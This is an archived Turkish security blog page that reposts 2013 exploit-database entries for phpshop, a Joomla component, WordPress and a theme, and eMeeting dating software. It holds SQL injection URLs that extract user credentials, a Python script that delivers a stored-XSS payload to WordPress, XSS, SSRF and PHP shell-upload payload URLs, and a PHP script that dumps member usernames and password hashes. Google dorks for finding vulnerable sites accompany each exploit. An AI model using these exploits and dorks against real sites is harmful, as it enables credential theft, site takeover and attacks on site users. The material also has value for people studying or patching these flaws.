Archive for 14 Ocak 2013

phpshop 2.0 SQL Injection Vulnerability

phpshop 2.0 SQL Injection Açığı bulunmuş olup, Açık bulucunun SQL injection’un oluşum yeri ve açık hakkındaki açıklamaları şu şekilde bulunmaktadır;

# Exploit Title : phpshop 2.0 SQL Injection Vulnerability
# Author        : By onestree
# Software Link : http://code.google.com/p/phpshop/downloads/list
# tested        : windows 7 / ubuntu
# Dork          : inurl:"tanyakan pada rumput yang bergoyang"
 
SQLi p0c:
 
==================
 
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
 
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
 
 
 
 
Thanks :
 
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
 
indonesiancoder - moeslimh4x0r - go-coder

Joomla Component com_performs component arbitary file upload

Joomla Component “com_performs” component arbitary file upload açığı bulundu. Açık sayesinde .php Shell upload edilebilmekte, server üzerinde zararlı yazılımlar, exploitler denenebilmekte, server üzerinden diğer sitelere erişim sağlanabilmektedir. Dosya upload açığı olan dizini geçici olarak kapatmakta fayda var.

# Exploit Title: [Joomla Com_performs component arbitary file upload]
# Google Dork: inurl:index.php?option=com_performs upload cv
# Date: [2012-09-27]
# Exploit Author: [Mormoroth]
# Vendor Homepage: [http://www.performs.org.au/]
# Version: [2.4 and prior]
# Tested on: [Linux/Windows]
------------
Attacker can upload files with uploader form
 
uploaded files go to /joomlaPath/media/uploads
 
this form builder rename uploaded file with simple combinition between date and time
 
for example if you upload file it will renamed to >> 2012-09-28-20-05-Unknown-file.txt
 
[2012-09-28] its current date and [20-05] is time of uploading file (Hour/Minute) And [Unknown] never change,after them your file name
 
by simple brute force you can find upload time which is hard part of guessing your exact uploaded file
------------
 
ISCN TEAM
 
http://blog.mormoroth.ir
http://ha.cker.ir
Follow me on Twitter And Facebook
http://twitter.com/Mormoroth
http://facebook.com/ISCNTEAM
 
ISCN Special Defacements Archive
http://www.zone-h.org/archive/special=1/notifier=ISCN
 
From Iran

WordPress 3.0.3 Stored XSS Exploit

WordPress 3.0.3 Stored XSS açığı bulunmuş olup, bu açıkla ilgili olarak düzenlenen exploit aşağıdadır.Son zamanlarda wordpress’in tüm eklentilerinde çok sayıda açık bulunmaya başlanmıştır. WordPress in tüm eklentileri mercek altına alınmış çok büyük bölümünde sql, xss, rfi gibi bol miktarda açıklar tespit edilmiştir. Bu açıklar mercek altına alınmalı ve derhal kapatılmalı, zararlı kod çalışdırma ve php dosya upload yolları kapatılmalıdır.

#Exploit Title: WordPress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised]
#Date: 14/01/2013
#Exploit Author: D35m0nd142
#Vendor Homepage: http://wordpress.org
#Version: 3.0.3
#Special thanks to Saif 
#configuration is reconfigurable according to your own parameters.
#!/usr/bin/python
import sys,os,time,socket
os.system("clear")
print "-------------------------------------------------"
print "     WordPress 3.0.3 Stored XSS exploit          "
print "   Usage : ./exploit.py <wp website> <text>      "
print "             Created by D35m0nd142               "
print "-------------------------------------------------\n"
time.sleep(1.5)
wp_site = sys.argv[1]
text = sys.argv[2]
 
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],80))
 
request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%  3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F"
request += sys.argv[1]
request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F"
request += sys.argv[1]
request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145"
 
print "--------------------------------------------------------------------------------------------------------------------------------------"
print request
print "--------------------------------------------------------------------------------------------------------------------------------------\n"
length = len(request)
poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text
print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc
time.sleep(0.7)
print "Sending %s bytes of data . . " % length
time.sleep(2)
 
sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n")
sock.send("Host: " + wp_site+"\r\n")
sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n")
sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n")
sock.send("Accept-Language: en-us,en;q=0.5\r\n")
sock.send("Accept-Encoding: gzip,deflate\r\n")
sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n")
sock.send("Keep-Alive: 300\r\n")
sock.send("Proxy-Connection: keep-alive\r\n")
sock.send("Referer:http://"+wp_site+"/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post' 
sock.send("Cookie:wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings-   time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n")
sock.send("Content-Type: application/x-www-form-urlencoded\r\n")
sock.send("Content-Length:%d\n" %length)
sock.send(request+"\r\n\r\n")
 
print sock.recv(1024)
 
print "\n[+] Exploit sent with success . Verify manually if the website has been exploited 🙂 \n"
 
except:
print "[!] Error in your configuration or website not vulnerable 🙁 \n"

WordPress Dailyedition-mouss Multiple Vulnerabilities

WordPress Dailyedition-mouss Multiple Açığı bulundu. Açık hakkında Açık geliştiricinin açığın oluşum yerleri, açığın kullanımı ve açık hakkındaki görüşleri şu şekildedir.

I want to warn you about multiple vulnerabilities in Daily Edition Mouss theme for WordPress.
 
In 2011 when I wrote about Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading (WASC-31) vulnerability, I've mentioned about Daily Edition theme among vulnerable themes for WordPress.
 
Ashiyane Digital Security Team released advisory about SQL injection vulnerability in Daily Edition Mouss theme (http://packetstormsecurity.com/files/118242/WordPress-Dailyedition-mouss-SQL-Injection.html). I'll supplement it with new vulnerabilities. It looks like that this is Daily Edition from WooThemes (original version under different path at the site or modified version of the theme). So besides SQL Injection it also has holes from TimThumb and many other vulnerabilities.
 
These are Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of Daily Edition Mouss theme for WordPress (to SQLi, IL, XSS, FPD and to AoF, DoS, AFU only earlier versions are vulnerable).
 
----------
Details:
----------
 
Information Leakage (SQL DB Structure Extraction) (WASC-13):
 
http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php
 
Leakage of SQL query with tables' names (including table prefix).
 
XSS (WASC-08):
 
http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Full path disclosure (WASC-13):
 
http://site/wp-content/themes/dailyedition-mouss/
 
Besides index.php there are also potentially FPD in other php-files of this theme.
 
XSS (WASC-08):
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg
 
Full path disclosure (WASC-13):
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1
 
Abuse of Functionality (WASC-42):
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
 
DoS (WASC-10):
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
 
About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
 
Arbitrary File Upload (WASC-31):
 
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php
 
AoF, DoS, AFU vulnerabilities are not working in last version of the theme (where I've tested them). It can be due to protection against AFU hole in TimThumb. But they must work in earlier versions of this theme.
 
------------
Timeline:
------------
2013.01.13 - found vulnerabilities.
2013.01.14 - disclosed to the lists.
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
 
((|))((|))((|))################((|))########################((|))
# Exploit Title: WordPress Dailyedition-mouss Theme         ((|))
# SQL Injection Vulnerability                               ((|))
# Google Dork: inurl:/dailyedition-mouss/fiche-disque.php       #
# Exploit Author: Ashiyane Digital Security Team                #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #
###############################((|))#############################
#******************************((|))****************************#
#* Location:  http://site.com/wp-content/                       #
#* /themes/dailyedition-mouss/                                  #
#* fiche-disque.php?id=[SQLi]                                   #
#* Demo: http://hotnewrap.net/wp-content/plugins/               #
#* dailyedition-mouss/fiche-disque.php?id=null'                 #

eMeeting Dating Software SQL Injection Exploit

eMeeting Dating Software SQL Injection Exploit açığı bulundu.
SQL injection’un oluşum yeri, açığın kullanımı ve açık hakkında açık bulucunun açıklamaları aşağıdaki şekilde bulunmaktadır.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: eMeeting Dating Software SQL Injection Exploit
# Date: 2013-1-14
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://datingscripts.co.uk/
# Category: webapps/php
# Price: $155
# Google dork: "Powered by eMeeting LLC"
# Tested on: version 9 & 10
##########################################
 
# Exploit:
<?php
echo"\n\n";
echo"------------------------------------------------------------------------\n";
echo"1     _                   __           __       __                     1\n";
echo"1   /' \            __  /'__`\        /\ \__  /'__`\                   0\n";
echo"0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1\n";
echo"1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0\n";
echo"0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1\n";
echo"1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0\n";
echo"0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1\n";
echo"1                  \ \____/ >> Exploit database separated by exploit   1\n";
echo"0                   \/___/          type (local, remote, DoS, etc.)    1\n";
echo"------------------------------------------------------------------------\n";
echo"\n\n";
 
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
$host=$_SERVER['argv'][1];
$path=$_SERVER['argv'][2];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0)){
$host="http://$host";
}
if(!$host=="http://localhost"){
$spos=strpos($host, "http://www.");
if (!is_int($spos)&&($spos==0)){
$host="http://www.$host";
}
}
$sql="inc/ajax/_actions.php?action=PopLinkedField&lid=1+union+select+concat(0x3e,username,'::',password)+from+members--"; # note: you can change table to "members_admin" if not found admin pass!
echo"exploiting...\n";
$source=file_get_contents($host.$path.$sql) or die('403 Forbidden..... Server has a Security'); 
$user=GetBetween($source,"this.value, >","::");
echo "username: $user\n";
$pass=GetBetween($source,"$user::",",>");
echo"hash: $pass\n";
} 
else{
echo"\n\n";
echo"Usage: php ".$_SERVER['argv'][0]." [host] [path]                       \n";
echo"Example: php ".$_SERVER['argv'][0]." http://www.site.com /path/    \n";
echo"\n\n";
}
function GetBetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r[1])){
$r = explode($end, $r[1]);
return $r[0];
 
}
return '';
}
 
?>
 
# greetz to: all Libyans hax0r5 🙂